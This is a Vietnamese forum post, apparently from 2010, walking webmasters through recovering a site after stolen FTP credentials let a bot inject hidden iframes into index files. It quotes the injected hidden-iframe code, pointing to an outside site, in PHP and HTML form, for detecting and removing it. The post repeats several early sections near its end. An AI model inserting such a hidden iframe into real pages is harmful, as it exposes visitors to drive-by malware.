[King-Game]
New Member
- Sau sự cố Forum Của Bác Style bị dính mã độc, tớ thấy trên mạng rất ích tài liệu hướng dẫn cụ thể cách khắc phục sự cố này nên tớ lập ra topic với mục đích nhìn lại toàn bộ sự việc đã xãy ra và sẵn tiện làm tài liệu cho các webmaster khác tham khảo. Nội dung chủ yếu là cách khắc phục khi sự cố đã xãy ra, còn biện pháp ngăn chặn mã độc xâm nhập thì tớ không bàn tới vì thật sự chẵng có cách cụ thể nào ngoài việc cẩn thận với những ID và Pass quản trị.
- Nếu website của bạn chưa bao giờ bị dính mã độc thì bạn nên đọc bài viết này, vì biết đâu trong một ngày đẹp trời nào đó, web của bạn bị dính thì chắc chắn lúc đó bạn sẽ không đủ bình tĩnh để đọc bài viết này 1 cách tỉ mĩ, hơn nữa các bước thực hiện trong bài viết này đòi hỏi bạn phải có 1 số kỹ năng nhất định mà trong 1 thời gian ngắn bạn khó có thể thành thạo được nếu chưa từng thực hiện.
- Tổng thời gian cho cuộc chiến giành lại quyền kiểm soát Forum Style trong sự cố này là hơn 6 tiếng, tính từ khoãn 10h ngày 06-05-2010 cho đến tầm 4h45 ngày 07-05-2010, lúc đó tớ chưa hề biết tý gì về Malware ngoài trừ cái tên của nó. Toàn bộ kiến thức và nội dung trong bài viết này do tớ tự thân vận động, không hề ăn cắp bản quyền của bất kỳ ai
1. Thăm dò trận địa
=> Chuẩn đoán xem website có bị dính mã độc không
- Một số webmaster thường không hề hay biết website mình bị dính mã độc, mãi cho đến khi được thông báo trực tiếp hoặc khi website đã rơi vào tình trạng tồi tệ. Sau đây là cách để nhận biết, chuẩn đoán mà tớ đã dùng cho Forum khi sự cố xảy ra, chúng có thể được áp dụng ngay nếu bạn vẫn chưa kiểm tra website của mình.
*. Với IE: thanh status liên tục nạp 1 trang không ngừng.
*. Với FireFox: khi dùng FireBug check code html sẽ thấy 1 iframe ở cuối trang gần tab </body>
*. Với Chrome: thì khỏi nói, báo ngay khi truy cập vào trang bị dính mã độc.
*. Với 1 số trình anti ví dụ như Avast: sẽ có thông báo tương tự khi truy cập vào trang bị dính mã độc.
*. Ngoài ra: tài khoản FTP dùng để tải file lên website sẽ có nhiều kết nối liên tục được thực hiện, một số trường hợp như với dreamhost sẽ khiến cho bạn kg thể login vào FTP được do đã maximun 10 kết nối.
*. Một số website ví dụ như CMS Drupal, phpBB Forum,... khi dính rất dễ nhận biết do font chữ sẽ bị lỗi, lớn hoặc nhỏ bất thường tại 1 số vùng, đôi khi là toàn bộ web, mặt dù CSS rất tốt.
*. Nếu những cách trên không có kết quả gì thì còn 1 cách khác là dùng tool cmd.exe kiểm tra xem máy tính đã login tài khoản FTP có bị dính spyware hay malware không. Bạn vào Start Menu => Run, gõ chính xác "cmd.exe" không gõ tắt"cmd", sau đó gõ lệnh "netstat -anob 5" lệnh này sẽ hiển thị các kết nối tứ máy tính đến các IP bên ngoài và refresh liên tục 5s 1 lần. Trong danh sách IP sẽ kèm theo tên chương trình, hãy kiểm tra xem có cái nào lạ không, nếu có thì đem lên google search xem có xác nhận về độ an toàn của ứng dụng đó kg. - Các cách chuẩn đoán khác như dùng Google Webmaster Tool, hay sử dụng các website kiểm tra trực tuyến khác sẽ không hiệu quả nếu bạn mới bị dính mã độc trong vòng 1 đến 2 ngày. Bài viết được đăng trên trang web autoit.72ls.net, mong đọc giả vào xem để ủng hộ Anh Em trong Forum viết tiếp.
2. Phán đoán tình hình địch
=> Tìm hiểu chuyện gì đã xảy ra, cách đối phương tấn công website.
- Nguyên nhân dẫn đến tình trạng này là do bạn đã bị một spyware hay malware nào đó đột nhập, lấy đi ID và Pass của 1 hay nhiều tài khoản FTP có khả năng truy cập vào webroot. Dựa vào những gì đã xãy ra trong sự cố với Forum Style, mình có thể đoán quá trình đột nhập lấy Pass FTP và cài mã độc lên website hoàn tự động. Tức là có 1 con bot trên máy tính của bạn gởi thông tin đến một máy khác,tại máy tính đó lại có 1 con bot thứ 2, thực hiện kết nối FTP thông qua tài khoản nhận được.Nhiệm vụ của con bot thứ 2 là tìm tất cả các file có tên đại loại như là index, default, main trong tài khoản FTP mang về thêm các mã độc vào rồi up lại vào chỗ củ.Còn lý do tại sao bị dính con bot thứ nhất (spyware, malware) thì chỉ có trời mới biết
3. Chuẩn bị tác chiến
=> Mục tiêu là tạo ra một chiến tuyến an toàn, tránh sự xăm nhập trở lại của con bot thứ nhất (spyware, malware)
- Cách khắc phục, dọn dẹp mã độc trên Website và loại bỏ spyware, malware trên máy tính.Thường thì quá trình tác chiến được làm trên máy tính hoàn toàn sạch, lúc này thì không có gì căng thẳng, chỉ cần đổi pass tài khoản FTP rồi tiến hành làm sạch các file bị nhiễm trên website là xong. Nhưng không gì có thể bảo đảm rằng máy bạn đang dùng hoàn toàn sạch, nên hướng dẫn bên dưới là giành cho trường hợp xấu nhất... chỉ có 1 máy tính duy nhất đã bị nhiểm độc và nhờ Avast 5 bản Free
----------> Bổ sung bài viết lúc 17:05 <----------> Bài viết trước lúc 17:00 <----------
bảo kê, cũng là trường hợp thực tế tớ đã trãi qua khi tác chiến trong sự cố với Forum Style.
- Nếu dùng Avast mà không thấy nó báo gì khi mở trang bị nhiễm mã độc thì bạn phải tìm cho ra 1 trình Ani khác thay thế. Sau đây là vài cái tên để bạn search gu gồ: Avira AntiVir, Comodo AntiVirus, ClamWin, PC Tools AntiVirus, AVG Anti Virus (Grisoft),.... Sẵn tiện nói lun, BKav không giúp được gì với sự cố này nên không cần phải mất công tải nó làm gì. Các trình anti lớn như kapersky, bitdefender,... không phải là lựa chọn tốt vì chúng khá nặng, sẽ gay cảng trở khi tác chiến đối với những chiến sĩ có máy tính kiêm tốn, từ 512MB trở xuống như trường hợp của tớ vậy. Một trong những tính năng quan trọng mà trình anti cần phải có để tác chiến là Quét Theo Thời Gian Thực , chức năng nhằm đảm bảo sẽ quét kiểm tra bất kì file nào được tải xuống máy tính hoặc đang hoạt động trên máy.
- Nếu máy tính bạn có Deep Freeze chưa hề được Thawed trong thời gian dài thì sẽ là 1 lợi thế. Nhưng nếu Deep Freeze không chỉ đóng băng ổ C mà là tất cả ổ đĩa thì có 2 lựa chọn cho bạn, 1 là gỡ deep freeze ra và hoàn toàn tin tưởng vào sự bảo vệ của trình anti, 2 là tiếp tục công việc chỉ với 1 lần khởi động máy tính. Ở đây tớ hướng dẫn theo tình huống chỉ đóng băng ổ C, hãy giữ nguyên trạng thái đóng băng (Frozen) cho ổ C,đừng bao giờ Thawed nó ra. Giờ khởi động lại máy tính, xong vào trực tiếp trang chủ của trình anti để tải rồi cài đặt nó và đừng mở bất kỳ trang web nào khác, trừ những ứng dụng mà tớ đề nghị mọi người tải khi tác chiến. Khi việc cài đặt trình anti hoàn tất hãy tiến hành quét toàn bộ máy tính, quá trình này mất vài tiếng, trong thời gian đợi chúng ta chuyển sang bước tiếp theo.
----------> Bổ sung bài viết lúc 17:09 <----------> Bài viết trước lúc 17:05 <----------
4. Kiểm soát trận địa
=> Mục tiêu chính của bước này là shutdown website và đưa cảnh báo tới người dùng.
Bài viết được đăng trên trang web autoit.72ls.net, mong đọc giả vào xem để ủng hộ Anh Em trong Forum viết tiếp.
- Việc thực hiện bước này trong thời điểm bắt đầu tác chiến còn một mục đích khác là giữ sự trong trắng của Tên Miền, không cho phép nó rơi vào danh sách đen (Black List) của Google cũng như có những review xấu ở những website khác.
- Hãy cho tên miền điều hướng Blog thì bạn cho domain điều hướng tới 1 Entry trong đó cũng được, như vậy dễ đưa ra thông báo hơn. Đây có thể là cách tốt nhất, chỉ tiết rằng lúc sự cố xảy ra tớ đã không đủ sáng suốt để sử dụng cách này.
- Trong trường bạn không thể điều hướng tên miền đi nơi khác, hãy đưa hệ thống vào trạng thái bảo trì với cảnh báo tương tự ở trên. Nếu không thể shutdown hệ thống từ giao diện web, hãy tiến hành cập nhật lại file index thông qua FTP account, bằng cách tạo trước 1 file index.php, xong đổi tên file index, file default, file main hoặc bất kỳ file nào mà bạn dùng để nạp trang chủ của website, cho nó thành 1 tên khác rồi up file index.php mới tạo lên. Lưu ý với cách này mã độc trên web vẫn được thực thi khi người dùng truy cập đến, cho nên trong thông báo bạn phải nói rõ để người dùng có sự phòng vệ kịp thời. Nếu kg nói rõ có khả năng rất lớn người dùng sẽ có ác cảmvới domain của bạn nếu mã độc gay hại cho người dùng.
- Có 1 cách khác nhanh hơn, giành cho những web có thể truy cập qua nhiều file tại webroot, ví dụ như với trường hợp của Forum phpBB, không chỉ có index.php ở webroot mà còn có cả memberlist.php, search.php,.... cách đó là đổi tên thư mục webroot, sau đó tạo 1 cái khác giống với tên củ rồi up file index.php mới lên việc này hoàn toàn có thể làm được nếu bạn đang dùng dreamhost vì cấu trúc thư mục web của nó giống với sơ đồ bên dưới.
----------> Bổ sung bài viết lúc 17:15 <----------> Bài viết trước lúc 17:09 <----------
1. -- root
2. -- -- [ ftp account name ] <= bạn sẽ ở đây khi login ftp account
3. -- -- -- [ tên domain ] <= đây là webroot, hãy đổi tên thư mục này
- Nếu tài khoản FTP của bạn không thể sử dụng được, thì buộc bạn phải truy cập vào cpanel trong qua giao diện web của Trang Host Chủ, lưu ý bước này mà không có trình Anti bảo kê thì 70% bạn bị mất luôn pass với Trang Host Chủ, do đó chưa cài Anti với chức năng Quét Theo Thời Gian Thực đã được kích hoạt thì đừng có dại mà log vào, trừ khi bạn có di động truy cập vào web được thì hãy đổi pass trên di động ngay khi đã login xong, nhớ ghi lại pass mới ra giấy nhé, vì rất dễ quên mất trong lúc dầu sôi lửa bỏng thế này, xong đâu vào đó rồi mới tiến hành cập nhật file index.php.
5. Chế tạo vũ khí
=> Kết quả của bước này là tạo ra những file sạch thế chỗ cho những file bị nhiễm độc
- Ở bước này phải bảo đảm Trình Anti đang quét toàn bộ hệ thống và chức năng Quét Theo Thời Gian Thực đang được kích hoạt. Việc cần làm là tải toàn bộ file của Website về lưu vào ổ đĩa không bị đóng băng bởi Deep Freeze thông qua tài khoản FTP bằng một ứng dụng thứ 3, không sử dụng giao diện web của Trang Host Chủ để tải website về nhé. Nếu chưa có ứng dụng loại này thì bạn có thể Tải FileZilla về sử dụng, nó miễn phí và khá tốt.
- Nếu bạn dùng trình Anti Avast được thì rất có lợi cho thời gian tác chiến, vì nó sẽ vừa quét toàn bộ hệ thống, vừa kiểm tra những file được tải xuống và nếu có file nào bị nhiễm mã độc nó sẽ lên danh sách. Khi quá trình tải website đang được thực hiện cũng như khi nó đã kết thúc bạn có thể lấy danh sách này cách bấm vào Hiện Tập Báo Cáo , như hình bên dưới.
- Tới đây tớ xin nói 1 tý về quy tắt mã độc được chèn vào website. Theo như tình huống mà tớ gặp, những đoạn mã đó chỉ nhằm vào những file có tên đại loại như là index, default và main để thường trú. Như vậy có 2 vấn đề cần được giải quyết ở đây, đó là trích lọc bằng cách nào và làm sạch những file bị nhiễm ra sao , 2 việc này phải thực hiện sao cho hiệu quả và nhanh nhất có thể, sau đây là cách mà tớ đã dùng.
----------> Bổ sung bài viết lúc 17:22 <----------> Bài viết trước lúc 17:15 <----------
a. Trích lọc không chỉ đơn giản là dựa vào danh sách bị nhiễm để copy từng file ra, vì nội chuyện lựa được chúng ra trong cả ngàn file của website thôi cũng đủ mệt, chứ chưa nói gì đến trở ngại khi tải chúng lên website trên internet vì mỗi file nằm ở những thư mục khác nhau, để nhớ hết không phải dễ, nếu số lượng file bị nhiễm lên khoãn 20 thôi là đủ chết người rồi, thực tế tớ đã phải cập nhật lại cho gần 100 file khi Forum bị nhiễm.
- Giải pháp của tớ là dùng một đoạn mã AutoIT tự động hóa việc này, sau khi thực thi đoạn mã đó, ta sẽ được một cây thư mục có cấu trúc giống cấu trúc thư mục của website, với các file bị nhiễm nằm đúng chỗ của chúng, lúc cần up lên website chỉ cần up thư mục góc thôi... rất nhanh, khi đó những file đã làm sạch sẽ được ghi đè lên những file bị nhiễm trên website. Đoạn mã này sẽ sao chép những file có các chuỗi index, default hoặc main trong file name với các phần mở rộng là html, htm hoặc php ra và để trong 1 thư mục có tên là new , nếu file bị nhiễm của bạn không thuộc những trường hợp trên thì phải nâng cấp mã nguồn của nó lên, để nâng cấp bạn phải có kiến thức cơ bản về lập trình và 1 ít hiểu biết về AutoIT.Ở đây tớ kg hướng dẫn cách nâng cấp file AU3 này chỉ nói cách sử dụng:
*. Đầu tiên là đổi tên thư mục webroot chứa các file của website trên máy tính thành www
*. Sau đó chép đoạn mã AutoIT hoặc file exe của nó vào cùng chỗ với thư mục chứa các file của website mà bạn đã đổi thành www ở trên, kết quả cuối cùng là bạn có là cấu trúc thư mục tương tự như bên dưới:
== D:\
== == [www] <= Thư mục chứa file của website
== == FindIndex.au3
== == FindIndex.exe
*. Xong ta kích cho đoạn code chạy, khi thấy thông báo Tìm được: ?? tức là quá trình sao chép đã hoàn tất, danh sách file đã sao chép sẽ được lưu trong file re.txt cùng thư mục.
*. Số lượng lấy được thường sẽ nhiều hơn số lượng bị nhiễm, như vậy thì tốt kg sao cả, nhưng nếu ít hơn thì bạn phải xem lại trong danh sách bị nhiễm để nâng cấp file FindIndex.au3 lên.
b. Vấn đề còn lại là bảo đảm file được trích lọc phải hoàn toàn sạch, không có mã độc. Nếu bạn trích lọc từ các file vừa tải xuống thì hầu hết bọn chúng đều bị nhiễm. Nhưng nếu bạn có lưu dự phòng website thì sẽ đỡ vất vả hơn rất nhiều, hãy thực hiện lọc file bằng code AutoIT FindIndex.au3 trên thư mục dự phòng. Rồi mang thư mục new có được đi kiểm tra lại bằng các bước tiếp theo:
- Lấy đại 1 file bị nhiễm nào đó từ những file trong website mới tải xuống, dùng notepad mở ra tìm đến đoạn mã độc, nó thường nằm ở cuối file, có dạng tương tự như code bên dưới.
Bài viết được đăng trên trang web hocautoit.com, mong đọc giả vào xem để ủng hộ Anh Em trong Forum viết tiếp.
+ Mã đọc trong file php có dạng:
echo "<iframe width='1' height='1' style='visibility:hidden;' src='http://virusvn.com'></iframe>" ;
+ Mã đọc trong file html và html có dạng:
1. <iframe width = '1' height = '1' style = 'visibility:hidden;' src = 'http://virusvn.com' > </iframe>
- Tới đây bạn phải tiến hành xóa mã độc đi khi đã nhận dạng được chúng, nhưng nếu file được lấy là từ thư mục dự phòng thì bạn có thể chuyển sang thao tác kế tiếp. Trong thao tác này, nếu số lượng file ở thư mục new ít, vào khoãn 10 file thì bạn có thể xóa mã độc bằng tay, nhưng nếu nhiều thì bạn lại phải dùng code AutoIT khác là DeleteCode.au3 , cách dùng code này như sau:
*. Cũng chép file DeleteCode.au3 vào chung chỗ với file FindIndex.au3.
*. Lấy chuỗi mẫu của mã độc trong 1 file có phần mở rộng làhtml, htm hoặc php gán vào biến $Code của file DeleteCode.au3, chú ý sử dụng dấu nháy kép [ " ] để tạo chuỗi,không dùng dấu nháy đơn [ ' ],nếu trong mẫu mã độc cũng có sử dụng dấu nháy kép [ " ] thì bạn phải thế dấu nháy kém đó bằng biến $c, như trong ví dụ bên dưới.
$Code = "echo " & $c & "<iframe width='1' height='1'style='visibility:hidden;' src='http://virusvn.com'></iframe>" & $c & ";"
----------> Bổ sung bài viết lúc 17:27 <----------> Bài viết trước lúc 17:22 <----------
*. Sau khi gán chuỗi xong bạn phải kích code 2 lần, 1 lần cho mẫu code độc trong các file dạng html và htm, lần còn lại cho mẫu trong các file dạng php, vì chúng có cấu trúc mã độc khác nhau. Ở đây buộc bạn phải nắm được những kiến thức cơ bản của ngôn ngữ HTML và PHP mới có thể xử lý chuỗi tốt được.
- Tiếp theo dùng một trình tìm kiếm văn bản nào đó để thực hiện việc search trên toàn bộ file của website với từ khóa là địa chỉ trong phần src của mã độc, trong ví dụ trên là virusvn.com , nếu không có src bạn có thể dùng bất kỳ chuỗi ký tự nào mà bạn cho rằng nó là đặt trưng của mã độc. Không nên dùng chức năng tìm kiếm có sẵn trong Window, vì nó rất cùi bắp không ích lợi gì, nếu chưa có trình tìm kiếm nào ưng ý bạn có thể Tải Effective File Search về dùng, đây là cái mạnh và nhanh nhất mà tớ biết, nếu kết quả là không tìm thấy file nào mang đặt trưng của mã độc trong thư mục new tức là nó đã an toàn, để bảo đảm hơn bạn có thể mở 1 hoặc 2 file bất kỳ ra kiểm tra.
- Khi thư mục new đã hoàn toàn sạch, bạn cần làm 1 thao tác kiểm tra khác, đó là sao chép thư mục website vừa mới tải về ra thêm 1 bản nữa để dự phòng,do việc này có thể mất từ 15 đến 20 phút nên ta hãy thực hiện ngay khi quá trình tải website về hoàn tất nhằm rút ngắn thời gian tác chiến. Sau đó bạn sao chép cấu trúc thư mục website trong new và đè lên cấu trúc của website mới tải về, việc này nhằm mục đích giả lập thao tác ghi đè khi ta làm thật với website trên internet. Rồi thực hiện lại bước tìm kiếm đặt trưngcủa mã độc ở trên với thư mục mới tải về của website đã ghi đè bằng thư mục new, thao tác này để kiểm tra xem đoạn code AutoIT FindIndex.au3 có trích lọc xót file bị nhiễm nào hay không.
- Nếu quá trình tìm vẫn còn thấy file bị nhiễm, thì bạn phải lấy file đó ra bỏ vào đúng vị trí của nó trong thư mục new và tiến hành loại bỏ mã độc, nếu số lượng bị xót là quá nhiều có thể bạn phải tiến hành nâng cấp file FindIndex.au3 và làm lại từ bước lọc file cho thư mục
----------> Bổ sung bài viết lúc 17:36 <----------> Bài viết trước lúc 17:27 <----------
website mà bạn vừa dùng new đè lên. Chỉ khi nào kết quả tìm kiếm không cho ra file nào nữa thì có nghĩa rằng bạn đã có được thư mục new hoàn toàn sạch và đầy đủ những file cần thiết, sẵn sàng để úp lên website thật trên internet.
=> Có thể bạn sẽ thắc mắc rằng tại sao đã quét những file đang tải xuống bằng Avast rồi còn phải search đặt trưng của Mã Độc làm gì, hoặc ngược lại nếu có thể quét đặt trưng của mã độc bằng Effective File Search thì tội gì phải dùng Avast làm chi cho rắc rối. Theo tính toán của tớ thì thời gian thực hiện 2 công việc này cộng lại cũng bằng thời gian thực hiện 1 trong 2 công việc, vậy tội gì mà không dùng cả 2 cách để tăng độ an toàn. Hơn nữa chắc gì cách dùng Effective File Search search đặt trưng có thể tìm được tất cả file bị nhiễm, mà nếu kg search theo đặt trưng thì lấy gì bảo đảm quá trình làm sạch code không bị xót file. Và chỉ cần bỏ xót 1 file thôi, sự lây nhiễm có thể bị lặp lại trên toàn hệ thống cũng như trên máy tính bạn.
[color=6. Củng cố phòng tuyến][/color]
=> Bảo đảm cuộc tấn công giành lại quyền kiểm soát website trên internet phải thành công.
- Khi đã có thư mục new , bạn có thể yên tâm rằng con bot thứ nhất (spyware,malware) sẽ không tấn công vào thư mục này vì đó kg phải là chức năng của nó. Ở bước này chúng ta sẽ kết thúc những gì đã bắt đầu ở bước 3, hãy đợi cho trình Anti hoàn tất việc quét toàn bộ hệ thống, cách xử lý tốt nhất với những file bị nhiễm được trình anti tìm thấy trên các ổ đĩa là xóa toàn bộ. Nếu những file bị nhiễm ở bước này nằm trong thư mục new thì bạn nên kiểm tra lại xem tại sao nó còn trong danh sách nhiễm, nếu đúng là còn xót mã độc trong đó thì hãy tiến hành làm sạch bằng tay.
- Khi đã hoàn tất việc quét, bạn không nên khởi động máy tính lại nếu đang ở trạng thái đóng băng (Frozen), cho dù là trình anti có kiu bạn làm như vậy. Lúc này máy tính của bạn đã được an toàn, vấn đề tiếp theo là tạo sự phòng thủ cho website ở trên internet, bằng cách đổi tất cả mật khẩu tài khoản FTP, tài khoản Host, còn đối với địa chỉ mail bạn đùng để đăng ký tài khoản Host thì không nên log vào, trừ khi bạn chắc chắn rằng nó đã bị lộ trong quá trình máy tính bị nhiễm. Nếu có di động cóthể truy cập web, tốt nhất nên dùng nó để đổi, vì như vậy an toàn hơn nhiều, dù rằng toàn bộ máy tính đã được quét.
- Khi các mật khẩu đã được thay đổi, hãy tiến hành khởi động lại website, điều hướng tên miền về chỗ củ, nếu bạn dùng cách đổi tên thư mục webroot thì hãyđổi lại, còn nếu dùng cách thay thế file index thì không cần làm gì cả. Lưu ý là không nên truy cập vào website khi không cần thiết, kể cả khi bạn đã shutdownwebsite từ giao diện web (Site maintenance: offline) thì cứ để như vậy kg cần thay đổi, bạn cũng đừng lo lắng vì trình Anti sẽ bảo vệ bạn, nếu nó không thông báo gì khi bạn truy cập vào trang bị nhiễm độc thì hãy xem lại, có thể bạn đã chọn nhằm trình Anti, điều này có nghĩa rằng bạn phải làm lại từ bước đầu tiên.
----------> Bổ sung bài viết lúc 17:44 <----------> Bài viết trước lúc 17:36 <----------
7. Tấn công tiêu diệt địch
=> Tiến hành loại bỏ mã độc trong website trên internet để chiếm lại website.
- Khi mọi thứ đã chuẩn bị tốt, hãy vào cpanel của host ngắt toàn bộ kết nối của các tài khoản FTP để làm gián đoạn những đợt tấn công của con bot đang up mã độc lên website trên internet. Nếu bạn đang dùng dreamhost thì hãy vào Users => Manage Users => Kill FTP Connections để thực hiện, còn với host khác thì tớ không chắc là có chức năng này không.Bên dưới là hình mình họa, Bài viết được đăng trên trang web hocautoit.com, mong đọc giả vào xem để ủng hộ Anh Em trong Forum viết tiếp:
- Sau đó liên tục connec vào tài khoản FTP, đợi khi kết nối thành công hãy up cấu trúc thư mục website trong new lên thông qua FileZilla hoặc bất kỳ chương trình FTP Manager nào cũng được, không sử dụng giao diện web trong cpanel và cần lưu ý rằng phải tìm đúng vị trí webroot trong thư mục New cũng như trên internet để up, nếu vội vàng ở bước này thì"Con trâu què của bạn có thể thành trâu chết".
- Sau đó truy cập vào web, dùng các cách kiểm tra ở bước 1 để xem website còn bị nhiễm mã độc không và cách 5 phút thì kiểm tra lại 1 lần, nếu vẫn bị tái nhiễm thì có những khả năng sau:
1. Bạn quên đổi pass hoặc quên ngắn kết nối của 1 tài khoản FTP nào đó.
=> Hãy tiến hành đổi pass lại cho tất cả tài khoản FTP và ngắt kết nối của chúng.
2. Máy tính của bạn chưa thoát khỏi con bot thứ nhất.
=> Bạn phải đổi trình anti khác hoặc đổi 1 máy tính khác rồi thực hiện lại bước 6 7.
- Chỉ khi nào sau 10 đến 20 phút kể từ khi bạn up lên mà không xãy ra hiện tượng tái nhiễm thì lúc đó bạn có thể ăn mừng chiến thắng. Lúc nãy hãy đi dọn dẹp những file index mà bạn đã đổi tên, vì chúng có thể còn mã độc trong đó.
- Nếu website của bạn chưa bao giờ bị dính mã độc thì bạn nên đọc bài viết này, vì biết đâu trong một ngày đẹp trời nào đó, web của bạn bị dính thì chắc chắn lúc đó bạn sẽ không đủ bình tĩnh để đọc bài viết này 1 cách tỉ mĩ, hơn nữa các bước thực hiện trong bài viết này đòi hỏi bạn phải có 1 số kỹ năng nhất định mà trong 1 thời gian ngắn bạn khó có thể thành thạo được nếu chưa từng thực hiện.
- Tổng thời gian cho cuộc chiến giành lại quyền kiểm soát Forum Style trong sự cố này là hơn 6 tiếng, tính từ khoãn 10h ngày 06-05-2010 cho đến tầm 4h45 ngày 07-05-2010, lúc đó tớ chưa hề biết tý gì về Malware ngoài trừ cái tên của nó. Toàn bộ kiến thức và nội dung trong bài viết này do tớ tự thân vận động, không hề ăn cắp bản quyền của bất kỳ ai
1. Thăm dò trận địa
=> Chuẩn đoán xem website có bị dính mã độc không
- Một số webmaster thường không hề hay biết website mình bị dính mã độc, mãi cho đến khi được thông báo trực tiếp hoặc khi website đã rơi vào tình trạng tồi tệ. Sau đây là cách để nhận biết, chuẩn đoán mà tớ đã dùng cho Forum khi sự cố xảy ra, chúng có thể được áp dụng ngay nếu bạn vẫn chưa kiểm tra website của mình.
*. Với IE: thanh status liên tục nạp 1 trang không ngừng.
*. Với FireFox: khi dùng FireBug check code html sẽ thấy 1 iframe ở cuối trang gần tab </body>
*. Với Chrome: thì khỏi nói, báo ngay khi truy cập vào trang bị dính mã độc.
*. Với 1 số trình anti ví dụ như Avast: sẽ có thông báo tương tự khi truy cập vào trang bị dính mã độc.
*. Ngoài ra: tài khoản FTP dùng để tải file lên website sẽ có nhiều kết nối liên tục được thực hiện, một số trường hợp như với dreamhost sẽ khiến cho bạn kg thể login vào FTP được do đã maximun 10 kết nối.
*. Một số website ví dụ như CMS Drupal, phpBB Forum,... khi dính rất dễ nhận biết do font chữ sẽ bị lỗi, lớn hoặc nhỏ bất thường tại 1 số vùng, đôi khi là toàn bộ web, mặt dù CSS rất tốt.
*. Nếu những cách trên không có kết quả gì thì còn 1 cách khác là dùng tool cmd.exe kiểm tra xem máy tính đã login tài khoản FTP có bị dính spyware hay malware không. Bạn vào Start Menu => Run, gõ chính xác "cmd.exe" không gõ tắt"cmd", sau đó gõ lệnh "netstat -anob 5" lệnh này sẽ hiển thị các kết nối tứ máy tính đến các IP bên ngoài và refresh liên tục 5s 1 lần. Trong danh sách IP sẽ kèm theo tên chương trình, hãy kiểm tra xem có cái nào lạ không, nếu có thì đem lên google search xem có xác nhận về độ an toàn của ứng dụng đó kg. - Các cách chuẩn đoán khác như dùng Google Webmaster Tool, hay sử dụng các website kiểm tra trực tuyến khác sẽ không hiệu quả nếu bạn mới bị dính mã độc trong vòng 1 đến 2 ngày. Bài viết được đăng trên trang web autoit.72ls.net, mong đọc giả vào xem để ủng hộ Anh Em trong Forum viết tiếp.
2. Phán đoán tình hình địch
=> Tìm hiểu chuyện gì đã xảy ra, cách đối phương tấn công website.
- Nguyên nhân dẫn đến tình trạng này là do bạn đã bị một spyware hay malware nào đó đột nhập, lấy đi ID và Pass của 1 hay nhiều tài khoản FTP có khả năng truy cập vào webroot. Dựa vào những gì đã xãy ra trong sự cố với Forum Style, mình có thể đoán quá trình đột nhập lấy Pass FTP và cài mã độc lên website hoàn tự động. Tức là có 1 con bot trên máy tính của bạn gởi thông tin đến một máy khác,tại máy tính đó lại có 1 con bot thứ 2, thực hiện kết nối FTP thông qua tài khoản nhận được.Nhiệm vụ của con bot thứ 2 là tìm tất cả các file có tên đại loại như là index, default, main trong tài khoản FTP mang về thêm các mã độc vào rồi up lại vào chỗ củ.Còn lý do tại sao bị dính con bot thứ nhất (spyware, malware) thì chỉ có trời mới biết
3. Chuẩn bị tác chiến
=> Mục tiêu là tạo ra một chiến tuyến an toàn, tránh sự xăm nhập trở lại của con bot thứ nhất (spyware, malware)
- Cách khắc phục, dọn dẹp mã độc trên Website và loại bỏ spyware, malware trên máy tính.Thường thì quá trình tác chiến được làm trên máy tính hoàn toàn sạch, lúc này thì không có gì căng thẳng, chỉ cần đổi pass tài khoản FTP rồi tiến hành làm sạch các file bị nhiễm trên website là xong. Nhưng không gì có thể bảo đảm rằng máy bạn đang dùng hoàn toàn sạch, nên hướng dẫn bên dưới là giành cho trường hợp xấu nhất... chỉ có 1 máy tính duy nhất đã bị nhiểm độc và nhờ Avast 5 bản Free
----------> Bổ sung bài viết lúc 17:05 <----------> Bài viết trước lúc 17:00 <----------
bảo kê, cũng là trường hợp thực tế tớ đã trãi qua khi tác chiến trong sự cố với Forum Style.
- Nếu dùng Avast mà không thấy nó báo gì khi mở trang bị nhiễm mã độc thì bạn phải tìm cho ra 1 trình Ani khác thay thế. Sau đây là vài cái tên để bạn search gu gồ: Avira AntiVir, Comodo AntiVirus, ClamWin, PC Tools AntiVirus, AVG Anti Virus (Grisoft),.... Sẵn tiện nói lun, BKav không giúp được gì với sự cố này nên không cần phải mất công tải nó làm gì. Các trình anti lớn như kapersky, bitdefender,... không phải là lựa chọn tốt vì chúng khá nặng, sẽ gay cảng trở khi tác chiến đối với những chiến sĩ có máy tính kiêm tốn, từ 512MB trở xuống như trường hợp của tớ vậy. Một trong những tính năng quan trọng mà trình anti cần phải có để tác chiến là Quét Theo Thời Gian Thực , chức năng nhằm đảm bảo sẽ quét kiểm tra bất kì file nào được tải xuống máy tính hoặc đang hoạt động trên máy.
- Nếu máy tính bạn có Deep Freeze chưa hề được Thawed trong thời gian dài thì sẽ là 1 lợi thế. Nhưng nếu Deep Freeze không chỉ đóng băng ổ C mà là tất cả ổ đĩa thì có 2 lựa chọn cho bạn, 1 là gỡ deep freeze ra và hoàn toàn tin tưởng vào sự bảo vệ của trình anti, 2 là tiếp tục công việc chỉ với 1 lần khởi động máy tính. Ở đây tớ hướng dẫn theo tình huống chỉ đóng băng ổ C, hãy giữ nguyên trạng thái đóng băng (Frozen) cho ổ C,đừng bao giờ Thawed nó ra. Giờ khởi động lại máy tính, xong vào trực tiếp trang chủ của trình anti để tải rồi cài đặt nó và đừng mở bất kỳ trang web nào khác, trừ những ứng dụng mà tớ đề nghị mọi người tải khi tác chiến. Khi việc cài đặt trình anti hoàn tất hãy tiến hành quét toàn bộ máy tính, quá trình này mất vài tiếng, trong thời gian đợi chúng ta chuyển sang bước tiếp theo.
----------> Bổ sung bài viết lúc 17:09 <----------> Bài viết trước lúc 17:05 <----------
4. Kiểm soát trận địa
=> Mục tiêu chính của bước này là shutdown website và đưa cảnh báo tới người dùng.
Bài viết được đăng trên trang web autoit.72ls.net, mong đọc giả vào xem để ủng hộ Anh Em trong Forum viết tiếp.
- Việc thực hiện bước này trong thời điểm bắt đầu tác chiến còn một mục đích khác là giữ sự trong trắng của Tên Miền, không cho phép nó rơi vào danh sách đen (Black List) của Google cũng như có những review xấu ở những website khác.
- Hãy cho tên miền điều hướng Blog thì bạn cho domain điều hướng tới 1 Entry trong đó cũng được, như vậy dễ đưa ra thông báo hơn. Đây có thể là cách tốt nhất, chỉ tiết rằng lúc sự cố xảy ra tớ đã không đủ sáng suốt để sử dụng cách này.
